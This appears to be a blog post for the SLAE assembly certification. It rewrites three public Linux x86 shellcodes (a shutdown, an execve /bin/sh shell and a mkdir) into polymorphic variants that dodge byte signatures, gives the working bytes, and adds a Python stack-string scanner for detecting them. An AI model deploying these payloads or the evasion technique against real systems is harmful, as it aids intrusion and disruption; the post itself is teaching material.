0x06 SLAE - Polymorphic versions

First sample from shell-storm

Original shellcode

shellcode-876.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start

_start:
  xor    eax,eax
  xor    edx,edx                ; edx = NULL (envp)
  push   eax
  push   0x682d                 ; "-h\0\0"
  mov    edi,esp                ; edi -> "-h"
  push   eax
  push   0x6e
  mov    WORD [esp+0x1],0x776f  ; "now\0"
  mov    edi,esp                ; edi -> "now" (replaces the "-h" pointer, so "-h" is never passed)
  push   eax
  push   0x6e776f64             ; "down"
  push   0x74756873             ; "shut"
  push   0x2f2f2f6e             ; "n///"
  push   0x6962732f             ; "/sbi"
  mov    ebx,esp                ; ebx -> "/sbin///shutdown"
  push   edx                    ; argv terminator (NULL)
  push   esi                    ; esi is never set in this code
  push   edi
  push   ebx
  mov    ecx,esp                ; ecx -> argv
  mov    al,0xb                 ; execve
  int    0x80

The original shellcode has 56 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-876.php

Polymorphic shellcode version

shellcode-876-poly.nasm
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes

global _start

_start:
  cdq                           ; edx = sign extension of eax
  mul edx                       ; eax = edx = 0, but only if eax was non-negative on entry
                                ; (true at _start and after the usual C test harness)
  push  word 0x682d             ; "-h" (no NUL pushed first; harmless, edi is overwritten below)
  mov    edi, esp
  push   eax
  push   0x6e
  mov    WORD [esp+0x1],0x776f  ; "now\0"
  mov    edi, esp               ; edi -> "now", as in the original
  push   eax                    ; NUL terminator for the path
  mov    dword [esp-4], 0x6e776f64    ; "down"   written below esp instead of pushed
  mov    dword [esp-8], 0x74756873    ; "shut"
  mov    dword [esp-12], 0x2f2f2f6e   ; "n///"
  mov    dword [esp-16], 0x6962732f   ; "/sbi"
  sub    esp, 16                ; now esp -> "/sbin///shutdown"
  mov    ebx, esp
  push   edx                    ; NULL
  push   esi
  push   edi
  push   ebx
  mov    ecx, esp               ; ecx -> argv
  mov    al, 0xb                ; execve
  int    0x80

As we can see in the block of code above, some of the assembly was modified so that it produces different shellcode bytes but gives the same result. The modified version has 69 bytes, which is less than 150% of the original shellcode; the maximum allowed for this sample in the assignment is 84 bytes.

The shellcode is :

\x99\xf7\xe2\x66\x68\x2d\x68\x89\xe7\x50\x6a\x6e\x66\xc7\x44\x24\x01\x6f\x77\x89\xe7\x50\xc7\x44\x24\xfc\x64\x6f\x77\x6e\xc7\x44\x24\xf8\x73\x68\x75\x74\xc7\x44\x24\xf4\x6e\x2f\x2f\x2f\xc7\x44\x24\xf0\x2f\x73\x62\x69\x83\xec\x10\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80

Here is also a simple demo of the shellcode generation and execution.

Second sample from shell-storm

Original Shellcode

/*
 Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 Date     : 10 Feb 2011
 Author   : kernel_panik
 Thanks   : cOokie, agix, antrhacks
*/

/*
 xor ecx, ecx
 mul ecx
 push ecx
 push 0x68732f2f   ;; hs//
 push 0x6e69622f   ;; nib/
 mov ebx, esp
 mov al, 11
 int 0x80
*/


#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
 printf ("Shellcode length : %d bytes\n", strlen (code));
 int(*f)()=(int(*)())code;
 f();
}

The original shellcode has 21 bytes. The file can be accessed here: http://shell-storm.org/shellcode/files/shellcode-752.php

Polymorphic shellcode version

; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes

global _start

_start:
  xor eax, eax
  xor ecx, ecx                  ; argv = NULL
                                ; note: unlike the original's mul ecx, edx (envp) is not zeroed here;
                                ; it is 0 at the entry point of a fresh process, but not guaranteed
                                ; inside a C test harness
  push eax                      ; NUL terminator
  mov dword [esp-4], 0x68732f2f ; "//sh"
  mov dword [esp-8], 0x6e69622f ; "/bin"
  sub esp, 8                    ; esp -> "/bin//sh"
  mov ebx, esp
  mov al, 11                    ; execve
  int 0x80

The polymorphic version has 30 bytes, which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was already very small, there are fewer possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.

Here is the shellcode:

\x31\xc0\x31\xc9\x50\xc7\x44\x24\xfc\x2f\x2f\x73\x68\xc7\x44\x24\xf8\x2f\x62\x69\x6e\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80

Third sample from shell-storm

Original shellcode

/*
 * This shellcode will do a mkdir() of 'hacked' and then an exit()
 * Written by zillion@safemode.org
 *
 */

char shellcode[]=
        "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
        "\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
        "\x61\x63\x6b\x65\x64\x23";


void main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

The sample can be accessed from shell storm: http://shell-storm.org/shellcode/files/shellcode-542.php

The author only gave the shellcode bytes. So, for the purpose of the SLAE, we will recover the assembly of that shellcode to understand it better and be able to create a polymorphic version of it.

echo -ne "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68\x61\x63\x6b\x65\x64\x23" >shellcode542

ndisasm -b32 shellcode542

00000000  EB16              jmp short 0x18
00000002  5E                pop esi
00000003  31C0              xor eax,eax
00000005  884606            mov [esi+0x6],al
00000008  B027              mov al,0x27
0000000A  8D1E              lea ebx,[esi]
0000000C  66B9ED01          mov cx,0x1ed
00000010  CD80              int 0x80
00000012  B001              mov al,0x1
00000014  31DB              xor ebx,ebx
00000016  CD80              int 0x80
00000018  E8E5FFFFFF        call 0x2
0000001D  6861636B65        push dword 0x656b6361
00000022  64                fs
00000023  23                db 0x23

The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.

Polymorphic shellcode version

I realized that a lot of the assembly in the original can be modified into a different version of it. Let's keep it simple. Basically, the shellcode creates a directory named "hacked" with permissions 775 via mkdir.

My final assembly polymorphic shellcode is pretty different but does the same thing.

; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes

global _start

_start:
  xor eax,eax
  push eax              ; NUL terminator for the path below

  ;sys mkdir
  mov al,0x27
  ; push "./hacked"
  push 0x64656b63       ; "cked"
  push 0x61682f2e       ; "./ha"
  mov ebx,esp           ; ebx -> "./hacked"
  ; mode 0777 octal = 0x1ff (the original used 0x1ed = 0755)
  mov cx, 0x1ff
  int 0x80

  ;sys exit
  push 0x1
  pop eax
  int 0x80              ; ebx still points at the path, so the exit status is its low byte

The shellcode is:

\x31\xc0\x50\xb0\x27\x68\x63\x6b\x65\x64\x68\x2e\x2f\x68\x61\x89\xe3\x66\xb9\xff\x01\xcd\x80\x6a\x01\x58\xcd\x80

The polymorphic version has 28 bytes. So, it's smaller than the original one, which is great.
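As an added illustration (not part of the original post or of the shell-storm samples) of the point made for all three samples, that the bytes change while the behaviour does not: a byte signature on the `push` sequence misses the rewritten variants, but a scanner that understands both encodings of a stack-built string still recovers the same path from each. The hex constants are this page's own shellcodes (sample 1's reassembled from its wrapped listing); the function names are mine.

```python
import struct

# Constructed inputs: the shellcode byte strings quoted on this page
# (sample 1 polymorphic, sample 2 original and polymorphic, sample 3 polymorphic).
SAMPLE1_POLY = bytes.fromhex(
    "99f7e266682d6889e7506a6e66c74424016f7789e750"
    "c74424fc646f776ec74424f873687574c74424f46e2f2f2f"
    "c74424f02f73626983ec1089e35256575389e1b00bcd80")
SAMPLE2_ORIG = bytes.fromhex("31c9f7e151682f2f7368682f62696e89e3b00bcd80")
SAMPLE2_POLY = bytes.fromhex(
    "31c031c950c74424fc2f2f7368c74424f82f62696e83ec0889e3b00bcd80")
SAMPLE3_POLY = bytes.fromhex(
    "31c050b02768636b6564682e2f686189e366b9ff01cd806a0158cd80")

def _decode(chunks):
    """Join the chunks in stack order (lowest address first), cut at NUL."""
    return b"".join(chunks).split(b"\x00", 1)[0].decode("latin-1")

def find_stack_strings(code: bytes) -> list:
    """Recover strings a shellcode builds on the stack, in either encoding:
    a run of immediate pushes (68 imm32 / 66 68 imm16) or the polymorphic
    form used above (C7 44 24 disp8 imm32 ... closed by 83 EC imm8)."""
    found, i, n = [], 0, len(code)
    while i < n:
        # Form 1: the last push lands lowest, so read chunks in reverse push order.
        chunks, j = [], i
        while j < n:
            if code[j] == 0x68 and j + 5 <= n:
                chunks.append(code[j + 1:j + 5]); j += 5
            elif code[j] == 0x66 and j + 4 <= n and code[j + 1] == 0x68:
                chunks.append(code[j + 2:j + 4]); j += 4
            else:
                break
        if chunks:
            found.append(_decode(reversed(chunks))); i = j
            continue
        # Form 2: dword writes at negative disp8 below esp, then sub esp, N with N == -min(disp).
        writes, j = {}, i
        while j + 8 <= n and code[j:j + 3] == b"\xc7\x44\x24":
            disp = struct.unpack("b", code[j + 3:j + 4])[0]
            if disp >= 0 or disp % 4:
                break
            writes[disp] = code[j + 4:j + 8]; j += 8
        if writes and j + 3 <= n and code[j:j + 2] == b"\x83\xec" \
                and code[j + 2] == -min(writes):
            found.append(_decode([writes[d] for d in sorted(writes)])); i = j + 3
            continue
        i += 1
    return found
```

The scanner is a linear byte matcher, not a disassembler: a data byte can mimic an opcode (the 'h' of "hacked" in the third original is 0x68, the push opcode), so treat its hits as candidates to confirm in a disassembler.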

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1374
